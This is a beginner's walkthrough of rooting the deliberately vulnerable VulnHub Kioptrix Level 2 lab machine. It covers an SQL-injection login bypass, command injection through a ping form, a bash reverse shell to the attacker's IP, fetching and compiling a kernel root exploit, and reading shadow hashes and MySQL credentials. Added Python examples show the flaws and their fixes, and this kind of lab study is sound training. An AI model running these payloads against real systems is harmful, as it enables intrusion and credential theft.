VulnHub — Kioptrix Level 2
Hello friends, this is my write-up of how to hack the Kioptrix Level 2 machine and get root access (Boot To Root).
First, before we begin, I want to say that the Kioptrix machines are considered the easiest machines on VulnHub; they are meant for beginners, and I'm still a beginner too :") So if you don't know how to deal with Level 1, take a look at my write-up for it, also done in an easy way: https://medium.com/@eslam3kl/vulnhub-kioptrix-level-1-345000a7e7a9
So after downloading the machine and setting it up in VMware or VirtualBox, let's get started…
In this walkthrough we'll deal with several types of vulnerabilities: SQL injection, OS command injection, and privilege escalation through a local kernel exploit.
But first I want to lay out the methodology I use to start on any machine:
0. Recon / information gathering (IPs, MAC addresses, information disclosure, server version, open ports, etc.)
1. Enumeration of the services found (SMB, HTTP, HTTPS, etc.)
The recon step tells us more about the machine: its IP, MAC, server type, open ports, system version, and so on.
First you should know your own (Kali) IP address; you can get it with the ifconfig command in your terminal.
Next I want to find the IP address of the target machine, so I'll use my own tool NetScanner, which is written in Python 2; you can download it from https://github.com/eslam3kl/NetScanner
Or you can use netdiscover, which is built into Kali, but I always use my tool because it returns results faster than netdiscover.
NetScanner → python network_scanner.py -i ip_address_range
Netdiscover → netdiscover -r ip_address_range
Now we know that the target's IP address is 10.0.2.23: the first three addresses belong to the Kali host and the virtual network's own services, so the odd one out, the last one, is our target.
Before doing the HTTP enumeration I want to start Nmap first, because a full scan takes a long time; we'll run it and do other enumeration in the meantime until it finishes. We'll analyse the scan results to find any port that may be vulnerable.
You'll notice that ssh, http, rpcbind, ipp, ssl/https and mysql are open, so I'll concentrate on http, ssh and mysql to start with. You'll also notice that Nmap identifies the OS as Linux 2.6.x.
#1 Enumeration (HTTP)
Go to your browser and open the IP address of the machine, which in my case is 10.0.2.23 (it may be different in your network).
You'll find a login panel that requires a username and password, so I think about SQL injection to bypass authentication by entering this payload in the username field: admin' # (the quote closes the username string and # starts a MySQL comment, so everything after it, including the password check, is thrown away).
Let’s see what will happen …
Nice! It worked. So the first finding on this machine is that the login page is vulnerable to SQL injection.
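To see why that payload logs us in, here is an added example (my own illustration, not code from this write-up or from the Kioptrix web app) that rebuilds the vulnerable login query the way a careless PHP page does and runs it against a constructed in-memory SQLite copy of the users table. SQLite does not understand MySQL's # comment marker, so the executed payload uses the equivalent -- comment; rendered_query() shows the exact MySQL query the page's payload produces. The table schema and the admin password are assumptions (only john/hiroshima comes from the write-up, and that only later).

```python
import sqlite3


# Constructed stand-in for the Kioptrix 2 "webapp" users table. The schema and the
# admin password are assumed; only john/hiroshima is taken from the write-up.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("admin", "placeholder-not-the-real-one"), ("john", "hiroshima")],
    )
    conn.commit()
    return conn


def rendered_query(username, password):
    """The query a naive PHP login builds by string concatenation (MySQL syntax)."""
    return (
        "SELECT username FROM users WHERE username='%s' AND password='%s'"
        % (username, password)
    )


def vulnerable_login(conn, username, password):
    """Executes the concatenated query: whatever the user typed becomes SQL."""
    row = conn.execute(rendered_query(username, password)).fetchone()
    return row[0] if row else None


def safe_login(conn, username, password):
    """Parameterised query: the input is bound as data and can never end the string."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = build_db()
    # What the page's payload turns the query into on MySQL: everything after # is
    # a comment, so the password check disappears.
    print(rendered_query("admin' #", "anything"))
    # Same trick with SQLite's comment marker: logs in as admin with no password.
    print(vulnerable_login(db, "admin' -- ", "anything"))  # admin
    print(safe_login(db, "admin' -- ", "anything"))        # None
    print(safe_login(db, "john", "hiroshima"))             # john
```

The fix is not escaping quotes by hand but binding the input as a parameter, as safe_login() does; the same payload then simply fails to match any row.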
After logging in you'll notice that the page asks you to ping a machine in your network, so I'll try to ping the machine's own localhost.
Nice! It worked and the machine pinged itself. The page is clearly handing our input to a system ping command, so it may be vulnerable to OS command injection, and through that I could read important files like /etc/passwd or anything else the web server's user can read.
Let's test this by appending a whoami command to see whether we're running as a normal user or as root. To run multiple commands in the same input you separate them with ; like this: localhost ; whoami
Now we know that at this moment we're just a normal user, not root, so we'll turn the command injection into a full shell by entering this input (localhost ; bash -i >& /dev/tcp/10.0.2.15/443 0>& 1), where 10.0.2.15 is the Kali IP, and listening on that port with nc for the incoming connection (nc -lvp 443).
Very very nice, it's vulnerable to OS command injection. Note that we're now in a shell on the target, and because it's a Linux OS we can use the same commands we know from Kali. If you look at the prompt you'll notice the $ character, which means we're still a normal user, so I'll use these privileges to collect more information about the machine that Nmap and Nikto didn't give me.
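The ping form works because the web app passes our whole input to a shell, and the shell treats ; as a command separator. Here is an added example (mine, not the write-up's or the Kioptrix app's code) that reproduces the vulnerable pattern and its hardened form, and builds the reverse-shell string used above. "echo ping" stands in for the real ping binary so the example runs offline; the HOST_RE allow-list and the function names are my own assumptions.

```python
import re
import subprocess

# "echo ping" stands in for the real ping binary so this runs offline; the shell
# semantics (the ; separator) are exactly what matters on the Kioptrix ping form.
PING_STUB = "echo ping"


def ping_vulnerable(target):
    """Mirrors a PHP system("ping -c 1 $target"): the whole string goes to /bin/sh."""
    result = subprocess.run(PING_STUB + " " + target, shell=True,
                            capture_output=True, text=True)
    return result.stdout


# Assumed allow-list: hostname characters only, so ; | & $ ` and spaces never get through.
HOST_RE = re.compile(r"[A-Za-z0-9.-]{1,253}")


def ping_hardened(target):
    """Allow-list the input, then run without a shell so metacharacters are never interpreted."""
    if not HOST_RE.fullmatch(target):
        raise ValueError("refusing target: %r" % target)
    argv = PING_STUB.split() + [target]  # ["echo", "ping", "<host>"]: no shell involved
    result = subprocess.run(argv, capture_output=True, text=True)
    return result.stdout


def reverse_shell_payload(attacker_ip, port, host="localhost"):
    """The form input used in the write-up: a harmless ping target, then a bash
    reverse shell over bash's built-in /dev/tcp (attacker runs: nc -lvp <port>)."""
    return "%s ; bash -i >& /dev/tcp/%s/%d 0>&1" % (host, attacker_ip, port)


if __name__ == "__main__":
    print(ping_vulnerable("localhost ; echo INJECTED"))  # ping localhost / INJECTED
    print(ping_vulnerable("localhost ; whoami"))         # second line: the web user
    try:
        ping_hardened("localhost ; whoami")
    except ValueError as err:
        print(err)                                       # refusing target: ...
    print(ping_hardened("localhost"), end="")            # ping localhost
    print(reverse_shell_payload("10.0.2.15", 443))
```

Two things matter in the hardened version: the input is validated against a strict allow-list, and the command is executed as an argv list with no shell at all, so even a character that slipped past validation would be passed to ping as a literal argument.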
For example, I'll use cat /etc/*elease to find the CentOS version.
So the CentOS release is 4.5, good for now. Let's collect more information about the kernel itself with uname -a
The Linux kernel version is 2.6.9-50.
Now we'll take this information and search for an exploit that matches the open ports and this kernel, using the searchsploit tool.
Based on the CentOS version and the kernel, we'll use the script 9545.c (the sock_sendpage() local root exploit for CentOS 4 kernels, CVE-2009-2692). Now we'll transfer this script to the machine and execute it there; that's how we'll get root. Keep in mind that kernel exploits can crash the box, so take a snapshot of the VM first.
Start a simple HTTP server on port 80 in the directory that holds the script.
To transfer the script, first copy it from its exploit-db directory into Kali's root home directory where the server is running, then on the target change directory to /tmp, where we have read and write permission. Then fetch the script with wget: wget http://10.0.2.15/9545.c
Next compile it on the target (it has gcc installed) with gcc -o start 9545.c and run the resulting start binary.
Bingo! You now have root privileges.
Now that we have root via the local exploit, we can also go looking for the admin's credentials, so let's continue…
As a normal user you can already read /etc/passwd (it's world-readable) but not /etc/shadow; as root you can read both, so change directory to /etc and read these files.
/etc/passwd lists the accounts on the system and /etc/shadow holds their password hashes.
Note the hashes at the end of /etc/shadow…
But unfortunately these passwords are hashed, so you can't get the original passwords easily; let's look for anything else that could give us credentials… What about SQL? This machine hosts the web application on localhost, so do you think it has a database? Sure! Let's look for it.
Go to /root and list the directory contents, including hidden files.
Note the hidden file .bash_history, which records every command typed in bash; open it to see its contents.
Great! root had run the command cat .mysql_history on this machine, so let's look for that file in /root too.
Great! We've found it :") Open it to see some amazing credentials, trust me 😇
See! Now we have great info about the database ^-^
There's a database named webapp with a users table that has user and password columns, holding user=john with password=hiroshima, and user=admin with a weird password :)
This data belongs to the webapp database, and the web application itself lives on the machine in /var/www/html/
You'll find two files, index.php and pingit.php; the second one doesn't hold anything important, so let's open the first one.
Great! As you can see, the database connection details in index.php give us the webapp credentials once again.
So far we have great information and credentials for the database and a user; let's dump more data, either with sqlmap or manually. I'll work manually…
Username=john , Password=hiroshima
With these credentials you can dump the whole database by walking the sequence databases → tables → columns → data.
The last screenshot shows the databases; dump each one to find any other sensitive data.
For the next dump you type mysql -u john -p --execute="select * from mysql.user"
-u → the username
-p → prompt for the password
mysql → the database name
user → the table name
Congratulations on the root access, bro ❤